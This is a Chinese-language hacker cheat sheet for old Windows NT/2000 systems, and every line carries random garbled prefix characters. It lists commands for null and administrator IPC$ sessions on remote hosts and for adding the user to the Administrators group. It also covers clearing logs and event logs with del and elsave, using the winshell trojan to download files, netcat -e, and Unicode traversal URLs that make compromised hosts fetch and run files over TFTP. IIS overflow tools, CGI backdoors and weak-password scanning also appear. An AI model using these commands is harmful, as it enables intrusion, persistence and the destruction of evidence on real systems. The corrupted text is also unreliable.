网管和黑客都必须知道的命令
#�S�ue�T"F 常用的几条NET命令:
�soF�^G21N qv6]Y��P�P (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
^iNR(cwgX� u�k,f}�Xc� (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
=x�oTH3/,> 7|�rT*-Ia (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
1o%Hn"u�G�
�
t2iFd?� (查看远程主机时间) net time \\IP地址
�nj
mE��>2 7Y��/_/t~Y (定时启动某个程序) at \\IP地址 02:18 readme.exe
q��M+T �Wp 8�@-US ,�| (查看共享) net view \\IP地址
A�7H=#L�+C R��9(�^CWs (查看netbios工作组列表) nbtstat -A IP地址
-|mABHjx�* �*�?{��)i~ (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
$`%��.Y&A� RS~�o�SoAE (这两条把自己增加到管理员组): net user 用户名 密码 /add
�@k��w�=�0 \�#slZ;&s net localgroup Administrators 用户名 /add
L��st���5� (��C�&f~U� (断开连接) net use \\IP地址\ipc$ /delete
R<�-KX�T9 ��&3<]FK� 扫尾:
&!�Z�pB�R( b11C3TyQT� del C:\winnt\system32\logfiles\*.*
*RPI$0���� zw?��6E8$h del C:\winnt\ssytem32\config\*.evt
���M4�| L� Sc&_�6�}�K del C:\winnt\system32\dtclog\*.*
S:gP\Atf>� # V���+e del C:\winnt\system32\*.log
* 7C�I q� �_),@�^^&x del C:\winnt\system32\*.txt
A Ho<E�"R\ <�$E8�T>�U del C:\winnt\*.txt
M5]w���U � #�/T)9�=m� del C:\winnt\*.log
<3HJk�cYGz u|e2T@�t�= 一、netsvc.exe
5s;#C/ZZ� c!zu0\[Id� 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
W8��)GT`�\ f&�:g�{�K� netsvc /list \\IP地址
�qp�Z�"��. �5gG�r|d|( netsvc schedule \\IP地址 /query
s�MZ��� \6 9E5B.qlw$l netsvc \\IP地址 schedule /start
~c4Y��*]J� Ae1�},2�py 二、OpenTelnet.exe
"'%�x|�n�B xfb%b�kr�� 远程启动主机的Telnet服务,并绑定端口到7878,例如:
�J#\/�z�nT ~jgd92�`{z OpenTelnet \\IP地址 用户名 密码 1 7878
V;$�lgTs|' ?S"�xR0 * 然后就可以telnet到主机的7878端口,进入DOS方式下:
&3rh{�"�^9 ��?pFHpz�� telnet IP地址 7878
k:��f�Rk<C q+<TD�#xoL 三、winshell.exe
QeG�U]WU�{ !�)GPI?{^5 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
D�G�cd|>�q @uc%]V<:k� p Path (查看winshell主程序的路径信息)
�m|!sY[�! 8��_>R�'u[ b reBoot (重新启动机器)
�5Q�l�J�X� grZN�.zTO� d shutDown (关闭机器)
)�[A}h'�J) ,�W.O*vC�A s Shell (执行后你就会看到可爱的“C:\>”)
jk~<��si� Q9(
eH2��= x eXit (退出本次登录会话,此命令并不终止winshell的运行)
m#uu�tomi0 BJqM=�<�nQ CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
h�Sxf;>(�d p0V���w@R= 四、3389登陆器,GUI方式登录远程主机的
xMe[�/7)�4 ����&4DWLI 五、elsave.exe
�~�U`�aH~R 1_A< nt?'R 事件日志清除工具
y�<)x`&pcD �f�+rB�I�E elsave -s \\IP地址 -l "application" -C
wE�dXaOEB5 /�gxwp:&lY elsave -s \\IP地址 -l "system" -C
�Zvc�{o8^z �'INdZ8�j_ elsave -s \\IP地址 -l "security" -C
cE�e�>�Lyt xSw ^v6!2� 执行后成功清除应用程序日志,系统日志,安全日志
�Ax&+UxQ0| +?%huJYK,� 六、hbulot.exe
W�)\~T�:Kn (|W@�p�\Q 开启win2kserver和winxp的3389服务
�#U^@)g�6� �X"yLo8y8$ hbulot [/r]
�<=W�Qs�2 )AnX[�:�y 使用/r表示安装完成后自动重起目标使设置生效。
F*QGzb�v) Y�#Kga�Z7N 七、nc.exe(netcat.exe)
�i),W�1<A1 o���n�d��F 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
nP] ~8ViS� 'E�n�6h"�{ 想要连接到某处: nc [-options] hostname port[s] [ports] ...
t'�^�/}=c- ��1D�6�iJ� 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
u\50,N9Wp{ YI|7a#�*F� 参数:
�E�#J�+.&2 -�|g~--@Q� -e prog 程序重定向,一旦连接,就执行 [危险!!]
0C7x�1��:� �4jvgyi�9
-g gateway source-routing hop point[s], up to 8
8d�P�^zjPj yKi* 8N"e< -G num source-routing pointer: 4, 8, 12, ...
^d��Q#\u�y �$P>ci4�]t -h 帮助信息
23zB@aE_?1 k<m�{�Wp;- -i secs 延时的间隔
~�h �-�0rE c'[l%4U8[� -l 监听模式,用于入站连接
5�MT$n4zKu p;g��$D=2 -n 指定数字的IP地址,不能用hostname
:dK/}��S�0 4\3Z$%2^LZ -o file 记录16进制的传输
LG(bdj�"NM <�y��BZsSj -p port 本地端口号
PC/�Oo~Gx q'[5�h>P�a -r 任意指定本地及远程端口
3s"�� R�v@ 2�}K7(y!?u -s addr 本地源地址
0X.pI1�jCO Yz4��Q!tL -u UDP模式
>���IsR�d �|.�X�?IJ` -v 详细输出——用两个-v可得到更详细的内容
�h>�9Gf�F3 LNtBYdB`pK -w secs timeout的时间
i�CnKQ���G Ng�2�qu!F7 -z 将输入输出关掉——用于扫描时
kU0e;r1��N 八、TFTPD32.EXE
nK�T\�/}�d Q�Y�PsqkF* 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
A�p=L�lZ�� �|X0h-k�X4 http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
�UO>ADRs}� m!V ?xGKJ� 然后可以直接令文件运行:
`�$7.�(.#s xh,�};TS(K http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
>�T�=($:n� vdV@G`)HPr 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
�gh���#�9< �xx_]e���4 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
g�?qm� >X�
pO[ �@2tF 一、一 Xscan命令行运行参数说明:
!K'j�[cA^� P;C3�{>G�9 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
vWc�=^tT�� )l~:P�u�vh 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
"8>�T����� N*y09?�/�h xscan -file <主机列表文件名> <检测项目> [其他选项]
E0[ec6^qwY !`JaYU�L[e 其中<检测项目> 含义如下:
�m��r&nB�� [�>� Q+=(l -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
gs7h`5�[es cxn3e�,d`� -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
Q/xT>cU��d {�26�/�S�Y -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
�j�#hFx�+S �gMS-mk��Z -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
3 -�Nwg9�U B&�3oo���� -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
Iy%� fg',% �L��)p*D( [其他选项] 含义如下:
MOi.bHCQJP .��SzP�ig� -v: 显示详细扫描进度
n]S
DpptM� 5�[suwaJQ� -p: 跳过Ping不通的主机
�L|A}A[�P� M�{�w[��hV -o: 跳过没有检测到开放端口的主机
`lygJI?H+{ *:L�-/Q�)i -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
